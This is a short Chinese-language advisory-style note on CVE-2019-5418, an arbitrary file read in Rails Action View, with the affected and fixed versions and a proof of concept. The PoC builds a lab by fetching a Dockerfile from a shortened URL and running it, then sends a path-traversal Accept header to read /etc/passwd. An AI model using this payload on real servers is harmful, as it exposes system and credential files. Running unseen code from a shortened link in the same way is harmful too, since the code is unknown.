CVE-2019-5418 File Content Disclosure in Action View (任意文件读取) Ruby on Rails

基本信息

漏洞描述：

Ruby on Rails 是一个WEB应用开发框架。通过构造Accept请求头与 render file：的调用相结合，可以导致目标服务器上的任意文件被渲染，造成文件内容泄漏。影响仅限于调用 render 来呈现文件内容而没有指定接受格式。

修复版本:

Rails 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1

漏洞危害：

远程攻击者可以通过精心构造的 HTTP 请求，通过伪造请求头 Accept ，来读取目标系统中的任意文件。

PoC

Ruby on Rails CVE-2019-5418 tweet-PoC

# 搭建靶场
curl -sL goo.gl/NFR6fJ > /tmp/NFR6fJ; 
docker build -f /tmp/NFR6fJ -t 2019-5418 .; 
docker run -d --name 2019-5418 -p3000:3000 2019-5418; 
sleep 4; 

# PoC
curl -H 'Accept: ../../../../../../../../etc/passwd{{' 'http://localhost:3000/robots';

参考资料

rails forum
https://groups.google.com/forum/#!topic/rubyonrails-security/pFRKI96Sm8Q

Ruby on Rails 路径穿越与任意文件读取漏洞分析 – 【CVE-2019-5418】
https://xz.aliyun.com/t/4448

漏洞预警：Ruby on Rails 任意文件读取漏洞 【网藤风险感知 公众号 2018/3/15】
link

• #Exploit
• #PoC
• #Ruby